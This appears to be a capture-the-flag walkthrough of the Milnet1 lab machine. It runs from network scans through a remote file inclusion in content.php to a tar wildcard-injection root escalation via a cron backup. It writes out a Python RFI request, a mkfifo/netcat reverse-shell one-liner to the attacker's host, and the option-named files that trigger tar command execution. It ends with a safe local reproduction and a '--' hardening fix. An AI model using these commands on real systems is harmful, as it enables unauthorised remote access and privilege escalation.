Milnet1

Tools:

  • netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Tamper Data

Use netdiscover to find the target's IP address on the local network:

netdiscover -i eth0 -r 192.168.41.0/24

192.168.41.154 is the target.

Then run nmap to find open ports and the services running on the target:

nmap -sV -v -O -A -T5 192.168.41.154 -p-

Ports 22 and 80 are open.

Use nmap's http-enum script against the web server:

nmap 192.168.41.154 -p80 --script http-enum

The info.php file exists.

Scan the web server with nikto:

nikto -h 192.168.41.154

Brute-force directories with wfuzz:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.41.154/FUZZ 2>/dev/null

Nothing interesting turned up.

I use Tamper Data to examine the GET/POST request parameters and find an interesting one: the route parameter that content.php receives from nav.php. Set up a netcat listener, then change the parameter value to http://192.168.41.149/reverse?

(At first I used reverse.php, which created a reverse shell back to my Kali box. I guess there is a filter on the target that filters out .php file names, so I just removed the .php. The trailing ? also keeps anything the target appends to the value in the query string rather than in the path, which is the usual reason a remote-include URL ends in ?.)

Get the shell:

To make the process easier, I created a short script, send_post.py:

send_post.py

#!/usr/bin/env python
# send_post.py: send the POST request carrying the remote-include payload
# to the target's content.php

import requests

url = 'http://192.168.41.154/content.php'

# Mimic the browser request captured with Tamper Data.
# Content-Length is deliberately left out: requests computes it from the
# encoded body, and a hard-coded value would truncate or break the request.
headers = {
    "Host": "192.168.41.154",
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "keep-alive",
    "Referer": "http://192.168.41.154/nav.php",
    "Content-Type": "application/x-www-form-urlencoded",
}

# The vulnerable parameter: the target includes whatever URL "route" points
# to, so it fetches and runs the reverse shell hosted on the attacking box.
payload = {
    "route": "http://192.168.41.149/reverse?"
}

r = requests.post(url, headers=headers, data=payload)
print(r.status_code)

Next, local enumeration. No luck with kernel exploits, so check the cron jobs:

cat /etc/cron*

That lists /etc/crontab. Read it:

cat /etc/crontab

It runs an interesting script, /backup/backup.sh. Check that file:

It uses tar. I searched for tar exploits, no luck.

Under /home/langman/SDINET there is a file, DefenseCode_Unix_WildCards_Gone_Wild.txt, describing code execution through tar: when tar is run with an unquoted * in a directory an attacker can write to, file names beginning with -- are parsed as tar options, and --checkpoint-action=exec= makes tar run an arbitrary command.

On Kali, start the listener:

nc -nlvp 443

On the target, drop the reverse shell script and the two option-named files into /var/www/html, the directory the backup job archives (tar runs the checkpoint command from that directory, so shell.sh must live there too):

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.41.149 443 > /tmp/f" > /var/www/html/shell.sh
$ touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
$ touch "/var/www/html/--checkpoint=1"

Wait for cron to run backup.sh; the root shell comes back to the listener:
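To see the wildcard trick work without a target, here is an added example (my own, not from the writeup or from the DefenseCode paper) that reproduces it in a throwaway directory and then shows a hardened invocation of the same backup command. It assumes GNU tar (the --checkpoint options are GNU-specific), and the planted shell.sh just drops a marker file in place of the netcat callback.

```sh
#!/bin/sh
# Added example: tar wildcard injection reproduced locally, plus the fix.
# Assumes GNU tar. The "shell" only creates a marker file, so nothing
# connects anywhere.

# Simulates the cron job: cd into the web root and archive everything
# with an unquoted glob. The shell expands * into file names, and any
# name starting with -- reaches tar as an option.
run_backup_vulnerable() {
    # $1 = directory to archive, $2 = archive path
    ( cd "$1" && tar cf "$2" * ) 2>/dev/null
}

# Hardened variant: "--" ends option parsing, so names starting with --
# are passed to tar as ordinary file operands. Using ./* instead of *
# works too, since no expanded name can then begin with a dash.
run_backup_hardened() {
    ( cd "$1" && tar cf "$2" -- * ) 2>/dev/null
}

# Plant the three files an attacker with write access to the web root
# would create: the script, and the two option-named files.
plant_payload() {
    # $1 = web root, $2 = marker file the fake shell should create
    printf 'touch "%s"\n' "$2" > "$1/shell.sh"
    touch "$1/--checkpoint=1"
    touch "$1/--checkpoint-action=exec=sh shell.sh"
}

# Runs the given backup function against a fresh directory.
# Returns 0 if the planted script executed during the backup, 1 if not.
check_injection() {
    backup_fn="$1"
    work=$(mktemp -d)
    marker="$work/pwned"
    mkdir "$work/html"
    echo "index" > "$work/html/index.html"
    plant_payload "$work/html" "$marker"
    "$backup_fn" "$work/html" "$work/backup.tar"
    if [ -e "$marker" ]; then
        rc=0
    else
        rc=1
    fi
    rm -rf "$work"
    return $rc
}

if check_injection run_backup_vulnerable; then
    echo "vulnerable backup: shell.sh was executed by tar"
else
    echo "vulnerable backup: shell.sh did not run (not GNU tar?)"
fi
if check_injection run_backup_hardened; then
    echo "hardened backup: shell.sh was executed (unexpected)"
else
    echo "hardened backup: shell.sh was only archived, not executed"
fi
```

Run it as sh. The first check reports that tar executed shell.sh, the second that the -- form merely archives the oddly named files. The same applies to any cron job that globs over a directory other users can write to, which is the check worth making whenever /etc/crontab points at a script that calls tar, chown, rsync or similar.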